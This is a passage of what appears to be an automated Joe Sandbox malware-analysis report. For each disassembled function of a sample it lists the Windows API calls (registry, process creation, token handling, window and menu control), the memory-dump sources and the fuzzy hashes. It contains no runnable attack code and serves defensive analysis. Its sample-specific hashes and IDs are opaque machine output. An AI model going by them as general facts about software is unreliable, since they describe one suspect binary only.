                                                              • Opcode Fuzzy Hash: 46dbff05e0bcdf8e580b5fcd30c8b4e07bad482868155a39d0428612696fdd47
                                                              • Instruction Fuzzy Hash: CCF06232519751DAE6647A7A7C0364B2694EB0273BB200A2FFC54D51D3FE289C49416C
                                                              APIs
                                                              • _memset.LIBCMT ref: 004BB644
                                                              • _memset.LIBCMT ref: 004BB653
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004F6F20,004F6F64), ref: 004BB682
                                                              • CloseHandle.KERNEL32 ref: 004BB694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: oO$doO
                                                              • API String ID: 3277943733-358147081
                                                              • Opcode ID: caa6b3b7ba6cf95354d21574fa8557027304edfd260bc5d0822475e7a40fe185
                                                              • Instruction ID: 895301e791b60ac6666730454d65729b4e9b20d7c4ee91ab41d7549f14aa65e3
                                                              • Opcode Fuzzy Hash: caa6b3b7ba6cf95354d21574fa8557027304edfd260bc5d0822475e7a40fe185
                                                              • Instruction Fuzzy Hash: 6DF0FEB25403047BE2106765BC06FBB7A9CEB09795F054036BE08E5192D7BA5C24C7BD
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00453F85), ref: 00454085
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0045408C
                                                              • EncodePointer.KERNEL32(00000000), ref: 00454097
                                                              • DecodePointer.KERNEL32(00453F85), ref: 004540B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 921470834120af926f4f7cbe216860375019214c46f213a24dcfec1a95eabfb3
                                                              • Instruction ID: 300108b336663d03eca51e1c98ce954b715ecd23b8c77600d3d3accb955de76a
                                                              • Opcode Fuzzy Hash: 921470834120af926f4f7cbe216860375019214c46f213a24dcfec1a95eabfb3
                                                              • Instruction Fuzzy Hash: E0E01A70540200ABDA509F61EE08B153AA4B710743F200139F505D51A0CFBA5698CA0C
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 3253778849-0
                                                              • Opcode ID: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction ID: 111daa243ca0d0f5473fc5fea8a330716a6465144956d8a81d34878b5c90ba2f
                                                              • Opcode Fuzzy Hash: 3f03857a6e89d49d2b23adb80710b0c1c05ec5fd0e72f6afcc0fdb021d4ac1ae
                                                              • Instruction Fuzzy Hash: 0E619E3050024A9BCF16EF65CC82EFE3BA5AF49308F05452EFC555B292DB789C06CB58
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B02BD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B02FD
                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004B0320
                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004B0349
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004B038C
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B0399
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                              • String ID:
                                                              • API String ID: 4046560759-0
                                                              • Opcode ID: 26a42224667bd3a5371d17698e45ecfe497825a01be491e3b2f62b2535d50af5
                                                              • Instruction ID: db81573fb31feb67f07116270f183e11e77e1861341c732e77d299452fa090bb
                                                              • Opcode Fuzzy Hash: 26a42224667bd3a5371d17698e45ecfe497825a01be491e3b2f62b2535d50af5
                                                              • Instruction Fuzzy Hash: 4E514E71108204AFD714EF65C885EAFBBE5FF88314F04491EF855872A2DB39D909CB56
                                                              APIs
                                                              • GetMenu.USER32(?), ref: 004B57FB
                                                              • GetMenuItemCount.USER32(00000000), ref: 004B5832
                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004B585A
                                                              • GetMenuItemID.USER32(?,?), ref: 004B58C9
                                                              • GetSubMenu.USER32(?,?), ref: 004B58D7
                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 004B5928
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountMessagePostString
                                                              • String ID:
                                                              • API String ID: 650687236-0
                                                              • Opcode ID: 1c3628315c99fedc3912471252a1c914bb6c13ff3362fd0420894b84e39a866e
                                                              • Instruction ID: 671b33b8e6195a396f5e1669aecaca47a1247113efad201ff336146c764adf39
                                                              • Opcode Fuzzy Hash: 1c3628315c99fedc3912471252a1c914bb6c13ff3362fd0420894b84e39a866e
                                                              • Instruction Fuzzy Hash: 5B517E35E00615EFCF15EF65C845AEEBBB4EF48314F10446AE905BB351CB78AE418BA8
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0048EF06
                                                              • VariantClear.OLEAUT32(00000013), ref: 0048EF78
                                                              • VariantClear.OLEAUT32(00000000), ref: 0048EFD3
                                                              • _memmove.LIBCMT ref: 0048EFFD
                                                              • VariantClear.OLEAUT32(?), ref: 0048F04A
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0048F078
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                              • String ID:
                                                              • API String ID: 1101466143-0
                                                              • Opcode ID: 05f4e366557a9f9b24a93ab77b684039115a079cc914a439c9ae10c89ccbdcf0
                                                              • Instruction ID: e95e931b27b41293def412a92d9a6d6bb4af60250d770f19d15f6c9613f102ef
                                                              • Opcode Fuzzy Hash: 05f4e366557a9f9b24a93ab77b684039115a079cc914a439c9ae10c89ccbdcf0
                                                              • Instruction Fuzzy Hash: 84516AB5A00209EFCB14DF58C880AAAB7B8FF4D314B15856AED59DB301E334E915CFA4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492258
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004922A3
                                                              • IsMenu.USER32(00000000), ref: 004922C3
                                                              • CreatePopupMenu.USER32 ref: 004922F7
                                                              • GetMenuItemCount.USER32(000000FF), ref: 00492355
                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00492386
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                              • String ID:
                                                              • API String ID: 3311875123-0
                                                              • Opcode ID: 26b0cf545d795cd13ab820f5a09f0df121587530da6eb80dd04b3d68a162bff2
                                                              • Instruction ID: ee41d9ad57ac48b1e9df1c5bb13c2861669730fadf18551cfb004bc432e802f1
                                                              • Opcode Fuzzy Hash: 26b0cf545d795cd13ab820f5a09f0df121587530da6eb80dd04b3d68a162bff2
                                                              • Instruction Fuzzy Hash: 8E51AE30600209FBDF31CF68DA88BAEBFF5AF45318F10427AE815A7291D3B89905CB55
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0043179A
                                                              • GetWindowRect.USER32(?,?), ref: 004317FE
                                                              • ScreenToClient.USER32(?,?), ref: 0043181B
                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043182C
                                                              • EndPaint.USER32(?,?), ref: 00431876
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                              • String ID:
                                                              • API String ID: 1827037458-0
                                                              • Opcode ID: 6d1e3d1f42b9bb7db9fc320a8b5e610491435315b8af1d67fffe173b3efbae59
                                                              • Instruction ID: d76a123bc0ff705356395e19a82b790cf03d34efff92c8cb0dae4b24016db21c
                                                              • Opcode Fuzzy Hash: 6d1e3d1f42b9bb7db9fc320a8b5e610491435315b8af1d67fffe173b3efbae59
                                                              • Instruction Fuzzy Hash: FB419F31504700AFD710EF25CC84FBA7BE8EB49764F04462AFAA4872B1D7349C56DB6A
                                                              APIs
                                                              • ShowWindow.USER32(004F57B0,00000000,01225850,?,?,004F57B0,?,004BB5A8,?,?), ref: 004BB712
                                                              • EnableWindow.USER32(00000000,00000000), ref: 004BB736
                                                              • ShowWindow.USER32(004F57B0,00000000,01225850,?,?,004F57B0,?,004BB5A8,?,?), ref: 004BB796
                                                              • ShowWindow.USER32(00000000,00000004,?,004BB5A8,?,?), ref: 004BB7A8
                                                              • EnableWindow.USER32(00000000,00000001), ref: 004BB7CC
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004BB7EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 72598b521a4069b705420464f7d4a44dc08f800f84b16d58a90b58e5738ae059
                                                              • Instruction ID: cb04806912d3d1b2bdc53491c2562db8b199a207f84a7f934c40bfbf38c4d2a7
                                                              • Opcode Fuzzy Hash: 72598b521a4069b705420464f7d4a44dc08f800f84b16d58a90b58e5738ae059
                                                              • Instruction Fuzzy Hash: 04419534600240AFDB21CF24C899BD57BE0FF45310F1841BAF9488F7A2CBB5A856CBA4
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,004A4E41,?,?,00000000,00000001), ref: 004A70AC
                                                                • Part of subcall function 004A39A0: GetWindowRect.USER32(?,?), ref: 004A39B3
                                                              • GetDesktopWindow.USER32 ref: 004A70D6
                                                              • GetWindowRect.USER32(00000000), ref: 004A70DD
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004A710F
                                                                • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              • GetCursorPos.USER32(?), ref: 004A713B
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004A7199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: f494605da67b4f177d9c3a6bdf6cec008a6ac47eb2f79a0045fabd36b50af478
                                                              • Instruction ID: dcf879b53f4d9db5118dba940de2dd81f45a140805f80f97e2d81cdb4866359e
                                                              • Opcode Fuzzy Hash: f494605da67b4f177d9c3a6bdf6cec008a6ac47eb2f79a0045fabd36b50af478
                                                              • Instruction Fuzzy Hash: AC31B472505305ABD720DF14CC49B9BBBE9FF99314F00062AF58997291C674EA09CBDA
                                                              APIs
                                                                • Part of subcall function 004880A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004880C0
                                                                • Part of subcall function 004880A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004880CA
                                                                • Part of subcall function 004880A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004880D9
                                                                • Part of subcall function 004880A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004880E0
                                                                • Part of subcall function 004880A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004880F6
                                                              • GetLengthSid.ADVAPI32(?,00000000,0048842F), ref: 004888CA
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004888D6
                                                              • HeapAlloc.KERNEL32(00000000), ref: 004888DD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 004888F6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0048842F), ref: 0048890A
                                                              • HeapFree.KERNEL32(00000000), ref: 00488911
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              • Opcode ID: 2093636edac730c67e3989b551c4833e91737cb5570e49b326d7d10b8be98bdf
                                                              • Instruction ID: b7870aed429b18e3c97659f3921e8038ae1b33fdd520a07bdf85e57711ccab41
                                                              • Opcode Fuzzy Hash: 2093636edac730c67e3989b551c4833e91737cb5570e49b326d7d10b8be98bdf
                                                              • Instruction Fuzzy Hash: F711D2B1501605FFDB10AF98CC09BBF7768EB41311F50492EE84993210CB3A9D04CB64
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004885E2
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004885E9
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004885F8
                                                              • CloseHandle.KERNEL32(00000004), ref: 00488603
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00488632
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00488646
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: 90e3a2b41b51f82eb96158803deddb0af4ef7cec1aaa30e168f042bd0673d572
                                                              • Instruction ID: f6be3b756895c3f96136d05b6df6842c27106fc2bf18bcba8b573503138a0cf3
                                                              • Opcode Fuzzy Hash: 90e3a2b41b51f82eb96158803deddb0af4ef7cec1aaa30e168f042bd0673d572
                                                              • Instruction Fuzzy Hash: 0B115972500209BBDF019FA8DD49BDF7BA9EF08304F044169FE04A2161C7769D65EB64
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0048B7B5
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0048B7C6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048B7CD
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0048B7D5
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0048B7EC
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0048B7FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 9a8675147205cd7b5728f465b28f665ad1fda0e4053c88ba7487b6da5c4069a9
                                                              • Instruction ID: 3ea944893fc5a3da7d3e21af04600d63655f48df9726506d2a84d55564eb19a4
                                                              • Opcode Fuzzy Hash: 9a8675147205cd7b5728f465b28f665ad1fda0e4053c88ba7487b6da5c4069a9
                                                              • Instruction Fuzzy Hash: A2017175E00309BFEF10ABE69C45A5EBFA8EB48311F004176FE08A7291D6309C04CF94
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00450193
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0045019B
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004501A6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004501B1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004501B9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004501C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 1c1389f5f9a5b0afba21de7289f9ecc9f8de28485629925c7305b4d2851af865
                                                              • Instruction ID: eea781d471832368adc9d55e24dfcdc49d9a20de8dd37078c437cf24f327e788
                                                              • Opcode Fuzzy Hash: 1c1389f5f9a5b0afba21de7289f9ecc9f8de28485629925c7305b4d2851af865
                                                              • Instruction Fuzzy Hash: 2F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004953F9
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0049540F
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 0049541E
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0049542D
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00495437
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0049543E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 09d62cd989ef1e7aef71939168b65707a8015b3a8773043c7687bbfc33925b7e
                                                              • Instruction ID: 4fcdf6be3c74799959579fe900c98a64c6e645956b9088b314ee1952719380ea
                                                              • Opcode Fuzzy Hash: 09d62cd989ef1e7aef71939168b65707a8015b3a8773043c7687bbfc33925b7e
                                                              • Instruction Fuzzy Hash: 09F01D32641558BBE7215BA69C0DEEB7B7CEBCAB11F000279FA08D10519AA51A0687B9
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00497243
                                                              • EnterCriticalSection.KERNEL32(?,?,00440EE4,?,?), ref: 00497254
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00440EE4,?,?), ref: 00497261
